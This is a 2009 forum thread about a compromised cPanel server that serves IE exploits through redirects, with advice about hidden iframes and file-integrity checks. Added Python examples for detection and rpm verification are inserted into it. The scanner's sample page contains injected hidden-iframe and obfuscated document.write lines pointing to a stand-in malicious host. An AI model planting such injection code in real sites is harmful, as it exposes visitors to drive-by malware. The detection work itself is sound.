The Community Forums


Virus on the server?

Discussion in 'General Discussion' started by scooby_london, Sep 28, 2009.

  1. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Hi Guys,

    I'm running the latest cPanel release on a CentOS 5 box and I figured out a few days ago that some of my sites do dodgy things.

    When you point a browser (IE7) at the site, the site shows a box which redirects to another server and tries to download some exe file.

    It's not happening all the time and not for all sites.

    I've checked the code of the sites and there is nothing wrong with it.

    How should I find the problem?

    Any Ideas?
     
    #1 scooby_london, Sep 28, 2009
    Last edited by a moderator: Sep 28, 2009
  2. MattCurry

    MattCurry Well-Known Member

    Joined:
    Aug 18, 2009
    Messages:
    275
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Houston, Tx
    Virus on Server

    Hello,

    I am sorry to hear that you are having this issue. This does sound odd, and if you know for sure that it is not supposed to be doing that I would recommend speaking with your Data Center to see if they can help with securing the server. Please let me know if you have any other questions.

    Thank you,
    Matthew Curry
     
  3. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    I think there's nothing wrong with the datacenter. I've seen that something similar happened previously to others.

    Already spoke with the datacenter.

    Basically my cPanel server got hacked and it is doing those IE exploits.

    Has anyone had that thing?

    What am I supposed to do now?
     
  4. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    The first thing you need to determine is the source of the redirects ....

    If you are seeing nothing in the site files, it is highly likely that your own computer at home is infected with a trojan or virus causing your internet connection to be hijacked erratically. This is actually fairly common and is also in use by a lot of advertisers as well who use spyware to force redirects of your internet connection.

    I would get very good virus, spyware, trojan scanners with the latest updates and do full complete scans of your computer.

    Moving on from that ....

    It is possible that your server may have also been compromised. That is a little bit more difficult to deal with and there is no magic solution I can just tell you since there are so many areas you need to check, so many things you need to review to be sure about your server. If you like though, I can give you a hand with that. ;)
     
  5. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Hi Spiral,

    I'm 100% sure that it is not a local machine problem. This has been tested in a few places and it seems to be a server thing.

    I've been running cPanel servers for a few years and never had that thing.

    Can you tell me how to check it?

    It is quite important for me.
     
  6. scooby_london

    scooby_london Member

    Joined:
    Apr 21, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Just ran the WHM trojan horses scan:

    -Possible Trojan - /usr/bin/aspell
    -Possible Trojan - /usr/bin/prezip-bin
    -Possible Trojan - /usr/bin/word-list-compress
    -Possible Trojan - /usr/bin/cpan
    -Possible Trojan - /usr/bin/instmodsh
    -Possible Trojan - /usr/bin/prove
    -Possible Trojan - /etc/cron.daily/logrotate
    -Possible Trojan - /usr/sbin/pureauth
    -Possible Trojan - /usr/sbin/antirelayd
    Any ideas/references to those files?
     
  7. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Check your page source code in different browsers.

    - IE and Firefox

    There are a few different hacks that are common; the most common lately is hidden iframes in websites. They are usually easy to find and sometimes harder to detect. They can be inserted by JavaScript or raw HTML. The purpose of them is usually to secretly direct the user to a site which tries to exploit the user's local system and turn it into a bot or mine the user's system for credit card information, etc.

    How they modify the source of your page can be in a few different ways:
    - they have root access to your server from outdated software like a kernel
    - they have a local account exploit or another user account exploit like a vulnerable PHP script to upload and execute scripts
    - they have gained access to a user's FTP account by stealing the password after infecting the user's PC with malware

    The scanning tools provided in WHM are basically completely useless, so don't rely on them.

    I suggest you hire someone to investigate your system and get this resolved. Keeping your site online will result in infecting more users and can get your site blocked from Google completely.
     
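As an added example (not code from the thread or from cPanel), the following script looks for the two injection patterns ramprage describes, hidden iframes and scripts pulled from another host, plus inline JavaScript that writes an iframe at run time, so a page's HTML can be checked the same way in every browser. The sample page and the `malicious.invalid` host are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that hides an element outright or pushes it far off-screen.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)

def _tiny(value):
    # True when a width/height attribute is 0 or 1 pixel.
    try:
        return int(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False

class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host   # hostname the page legitimately lives on
        self.findings = []           # list of (kind, detail) tuples
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            if (_tiny(a.get("width")) or _tiny(a.get("height"))
                    or "hidden" in a or HIDDEN_STYLE.search(a.get("style") or "")):
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script":
            self._in_script = True
            host = urlparse(a.get("src") or "").hostname
            if host and host != self.site_host:      # script pulled from another host
                self.findings.append(("offsite-script", a["src"]))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        # Inline JS that builds an iframe at run time, a common obfuscation.
        if self._in_script and re.search(r"document\.write|unescape\(|eval\(", data) \
                and "iframe" in data.lower():
            self.findings.append(("script-writes-iframe", data.strip()[:60]))

def scan_html(html, site_host):
    # Return the suspicious constructs found in one page's HTML, in document order.
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    return scanner.findings

# Constructed sample page: one legitimate script followed by three injected lines.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1><script src="/js/site.js"></script>
<iframe src="http://malicious.invalid/x.php" width="0" height="0"></iframe>
<script src="http://malicious.invalid/a.js"></script>
<script>document.write(unescape('%3Ciframe src=%22http://malicious.invalid/%22%3E'));</script></body></html>"""
```

Run `scan_html` over each document root's HTML files with the site's own hostname; an empty list means none of the three patterns was found, not that the page is clean.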
  8. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    That's not really a "Trojan" detector per se ....

    All that script really does is detect recent file changes, which may in fact be perfectly normal if you received any system updates, etc.

    I wouldn't worry about any of those above.

    I received your other message and whenever I can catch up to you,
    we'll get to the bottom of things fairly quickly. ;)
     
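Spiral's point is that the WHM scan keys on recent modification times, which legitimate package updates also produce. The added example below (not from the thread or from cPanel) classifies `rpm -V` output for the flagged paths so that a size or digest mismatch stands out from a mere mtime change; the `SAMPLE_RPM_V` output is constructed, and `verify_paths` assumes a CentOS host with `rpm` available.

```python
import subprocess

# rpm -V prints one flag per check: S size, M mode, 5 digest, D device,
# L symlink target, U user, G group, T mtime (and P capabilities on newer rpm).
# A change in size, digest, mode or link target means the file itself differs
# from what the package shipped; the rest is metadata.
ALTERED_FLAGS = set("S5ML")
NOT_OWNED = " is not owned by any package"

def classify_line(line):
    """Map one `rpm -V` output line to (path, verdict), or None for blank lines."""
    line = line.rstrip()
    if line.startswith("file ") and line.endswith(NOT_OWNED):
        return line[len("file "):-len(NOT_OWNED)], "unowned"   # not installed by any RPM
    parts = line.split()
    if not parts:
        return None
    if parts[0] == "missing":
        return parts[-1], "missing"
    flags, path = parts[0], parts[-1]          # an optional 'c'/'d'/'g' marker may sit between
    if ALTERED_FLAGS & set(flags):
        return path, "altered"
    return path, "metadata-only"               # e.g. only T (mtime) moved: usually benign

def classify_output(text):
    """Parse full `rpm -V` output into {path: verdict}."""
    verdicts = {}
    for line in text.splitlines():
        hit = classify_line(line)
        if hit:
            verdicts[hit[0]] = hit[1]
    return verdicts

def verify_paths(paths):
    """Run `rpm -Vf` on the flagged paths; a path absent from the output passed every check."""
    out = subprocess.run(["rpm", "-Vf", *paths], capture_output=True, text=True).stdout
    verdicts = classify_output(out)
    return {p: verdicts.get(p, "passed") for p in paths}

# Constructed sample output in rpm -V format for four of the paths WHM flagged.
SAMPLE_RPM_V = """.......T.    /usr/bin/aspell
S.5....T.    /usr/bin/prove
.......T.  c /etc/cron.daily/logrotate
file /usr/sbin/pureauth is not owned by any package
"""
```

Files reported as "unowned" are not covered by the RPM database at all, so they need a different reference (the installer that placed them, or a known-good copy) rather than `rpm -V`.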